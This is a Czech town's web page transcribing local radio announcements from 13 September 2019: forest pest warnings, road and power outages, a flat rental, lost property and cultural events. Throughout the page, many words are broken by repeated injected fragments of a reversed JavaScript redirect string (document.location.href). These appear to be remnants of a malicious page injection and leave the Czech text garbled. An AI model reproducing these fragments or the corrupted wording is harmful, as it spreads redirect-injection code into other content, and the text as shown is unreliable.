Rainbow page separator

Hlášení městského rozhlasu vysílaného dne 13. září 2019

Pátek, 13. září 2019

Žďár nad Sázavou / Přinášíme Vám aktuální informace z hlášení městského rozhlasu vysílaného dne 13. září 2019.

Z ÚŘADU:

Městský úřad Žďár nad Sázavou, odbor životního prostředí v souvislosti s kůrovcovou kalami[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou upozorňuje vlastníky lesů na nárůst stavu kůrovců v lesích a žádá je, aby opě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovně prověřili v součinnosti s odborným lesním hospodářem stav lesů a odstranili, popřípadě asanovali napadené stromy. Napadené dřevo je třeba urychleně mechanicky či chemicky ošetřit a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to před výletem dospělců z napadeného dříví. Bližší informace najdete na webových stránkách města.

Upozornění pro občany od městského správce lesů.

Od dnešního dne do konce měsíce září probíhá v městských lesích těžba dřeva velkým těžebním strojem harves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor. Žádáme občany, kteří navštěvují městské lesy, aby se okolí prováděné těžby důsledně vyhýbali. Jedná se o lesy Vetla, Radonínský les a les za Žďasem. Děkujeme za pochopení.

Vzhledem k výpadku ve výrobě materiálu na opravu šachty v ulici Husova je společnost SATT nucena posunout opravu horkovodu a celou uzavírku ulice na období od 2. září do 30. září 2019. Do té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to doby budou dodávky tepelné energie v dané lokalitě bez omezení. Při opravě budou postiženi odběratelé v ulicích Veselská (pouze část před MŠ Sluníčko), Husova, Hálkova, Binkova, Drdlova, Sadová, Nádražní (od pošty směrem k nám. Republiky), Tyršova (od pošty k divadlu).

Ve dnech 17. – 18. září 2019 budou při svozu bioodpadu vymyty všechny přistavené popelnice. Žádáme občany, aby své nádoby přistavili včas – náhradní termín na vymytí již nebude. Budou vymyty jak malé popelnice od rodinných domů, tak i popelnice umístěné na veřejném prostranství.

Městský úřad Žďár nad Sázavou Vás zve na Den otevřených dveří 20. září 2019 od 13:00 do 19:00 hodin ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát na téma My a Unesco. Přijďte se podívat, zasoutěžit si, zaspor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat a prožít zajímavé odpoledne.

Zveme Vás na prohlídku rekonstruované spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní zóny v areálu pro fotbal a tenis na Bouchalkách, která se bude konat zítra 14. září 2019 od 15:00 do 17:00 hodin. Přijďte si prohlédnout nově zrekonstruované pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory zázemí pro spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovce a užít si spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní odpoledne s rodinou a přáteli.

VYHLÁŠENÉ ZÁMĚRY MĚSTA:

Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to Žďár nad Sázavou vyhlašuje záměr na pronájem bytu č. 26, v budově č. p. 1932, č. o. 43 na ulici Brodská, Žďár nad Sázavou 3. Základní nájemné činí 1 432,- Kč/měsíc.

Na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bytě není v době vyhlášení záměru přihlášena k trvalému pobytu žádná osoba. Přihlášky je možné podávat do 26. září 2019 do 12:00 hodin. Bližší informace naleznete na úřední desce města.

VÝLUKY: 

E.ON Distribuce a.s. oznamuje, že bude přerušena dodávka elektrické energie v úterý 17. září 2019 od 7:30 do 12:30 hodin na ulici U Táferny (mimo RD č. 91, 92 a 440), část ulice Purkyňova od ul. U Táferny po d. č. 452/3 a 450/16 včetně, ulice Santiniho č. 38/4 (Restaurace Táferna), č. 183/2. 

E.ON Distribuce a.s. oznamuje, že bude přerušena dodávka elektrické energie ve středu 18. září 2019 od 7:30 do 11:30 hodin na ulici Vysocká od kruhového objezdu pravá strana ulice směr Vysoké (mimo č. o. 33 a 63), ulice V Lískách, Na Úvoze, K Přehradě. Bližší informace naleznete na úřední desce města.

ZTRÁTY A NÁLEZY:

Odbor finanční oznamuje, že na ztráty a nálezy byly v průběhu [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to týdne předány následující nálezy: svazek klíčů + klíčenka, pouzdro s brýlemi, 2 x svazek klíčů, ces[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní taška a látkový ba[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toh. Úplný seznam nalezených věcí je zveřejněn na úřední desce i na facebooku města. Bližší informace Vám poskytne Alena Benešová na tel. čísle 566 688 146 nebo osobně v kanceláři finančního odboru v 1. patře městského úřadu, dveře č. 35.

KULTURNÍ POZVÁNKY:

Přijměte pozvání na Žďárské farmářské trhy, které se budou konat zítra 14. září 2019 na náměstí Republiky.

Do neděle 15. září 2019 probíhá kulturní festival Slavnosti jeřabin. Kompletní program festivalu naleznete na webových stránkách města.

Zveme vás na akci v rámci Evropského týdne mobility, která se uskuteční ve středu 18. září 2019 na náměstí Republiky. Od 13:00 do 17.00 hodin si budete moci prohlédnout a vyzkoušet elektromobily, elektrokola a koloběžky nebo se pobavit s odborníky na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to téma.

Kino Vysočina Vás zve v sobotu 14. září 2019 ve 14:30 hodin na film „Toy S[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory 4: Příběh hraček“